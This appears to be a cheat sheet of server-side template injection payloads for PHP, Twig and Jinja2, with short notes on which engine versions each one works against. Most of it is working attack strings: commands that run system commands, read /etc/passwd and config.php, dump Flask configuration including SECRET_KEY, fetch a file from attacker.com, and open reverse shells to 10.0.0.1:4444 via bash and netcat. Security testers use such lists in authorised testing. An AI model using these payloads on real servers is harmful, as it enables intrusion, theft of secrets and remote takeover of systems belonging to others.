🎨 SSTI (Server-Side Template Injection) Testing


1. Simple Template Injection

Start with harmless arithmetic probes. If the response contains 49 where the literal probe text should be, the input reaches a template (or string-evaluation) sink. Which syntax evaluates already narrows the engine: {{ }} is Jinja2/Twig style, ${ } is PHP double-quoted string interpolation and the Java FreeMarker/Velocity family, #{ } is Ruby-style interpolation.

Basic Payloads:
• ${7*7}
• #{7*7}
• {{7*7}}

The following only execute where the sink is PHP itself (for example a double-quoted string handed to eval()); in a real template engine they render as text or throw a syntax error:
• ${system('whoami')}
• ${phpinfo()}
• ${passthru('dir')}

2. Advanced Template Injection

PHP SSTI Payloads

These rely on PHP evaluating ${...} inside a double-quoted string. Only functions that write to output (system(), passthru(), readfile(), phpinfo()) show their result in the page; exec(), shell_exec(), backticks, file_get_contents() and phpversion() return a value that is silently used as a variable name, so confirm them through side effects (delay, DNS/HTTP callback) or by echoing the result. dir and net user are Windows commands; use ls and id on Linux.

Code Execution:
• ${system('whoami')}
• ${exec('whoami')}
• ${shell_exec('dir')}
• ${passthru('net user')}
• ${`whoami`}

File Operations (the URL form needs allow_url_fopen enabled):
• ${file_get_contents('/etc/passwd')}
• ${readfile('config.php')}
• ${file_get_contents('http://attacker.com/shell.txt')}

PHP Info:
• ${phpinfo()}
• ${phpversion()}
• ${get_defined_functions()}

Reverse Shell (the bash form needs /dev/tcp support; nc -e is only available in netcat builds that support it, not OpenBSD nc):
• ${system('bash -i >& /dev/tcp/10.0.0.1/4444 0>&1')}
• ${exec('nc -e /bin/sh 10.0.0.1 4444')}

Twig SSTI (if Twig is used)

The first payload abuses the undefined-filter callback of Twig 1.x; that API was removed in Twig 2. The filter('system') form works on Twig 2.10 and later, including 3.x, when the environment is not sandboxed.
• {{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("whoami")}}
• {{['id']|filter('system')}}
• {{['cat /etc/passwd']|filter('system')}}

Jinja2 SSTI (Python)

config.items() and request.application are Flask-specific (config includes SECRET_KEY); the __subclasses__() listing is engine-independent and is used to locate a class such as subprocess.Popen by index.
• {{config.items()}}
• {{''.__class__.__mro__[1].__subclasses__()}}
• {{request.application.__globals__.__builtins__.__import__('os').popen('id').read()}}